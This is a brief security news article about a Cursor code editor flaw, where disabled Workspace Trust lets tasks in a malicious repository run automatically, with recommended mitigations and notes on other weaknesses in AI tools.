A new security flaw has been found in the AI-powered code editor Cursor. The issue could let attackers run code silently on a user’s computer if they open a malicious repository.
The problem comes from a key security setting called Workspace Trust. In Cursor, this feature is turned off by default. This means that tasks in a hidden file, such as .vscode/tasks.json
, can run automatically when a developer opens a project. As a result, simply browsing a malicious repository could trigger code execution without any warning.
Cursor is based on Visual Studio Code, which includes Workspace Trust to prevent such risks. But with the feature disabled in Cursor, attackers can use it as a vector for supply chain attacks. According to Oasis Security, this flaw could expose sensitive data, change files, or even give attackers deeper access to a system.
Security experts recommend enabling Workspace Trust, checking unknown repositories in a separate editor, and reviewing files before opening them in Cursor.
The discovery highlights a growing concern: AI-powered coding tools are facing both new and old types of threats. Alongside prompt injection attacks, which trick AI into running unsafe commands, researchers are also finding traditional security flaws in these platforms.
Recent reports show vulnerabilities across several AI development tools, including SQL injections, path traversal, and authentication bypass issues. Some flaws could let attackers steal API keys, read sensitive files, or even run remote commands.
Experts warn that as AI-driven development grows, security must remain a top priority. Classic protections like sandboxing, authentication, and code review are still critical.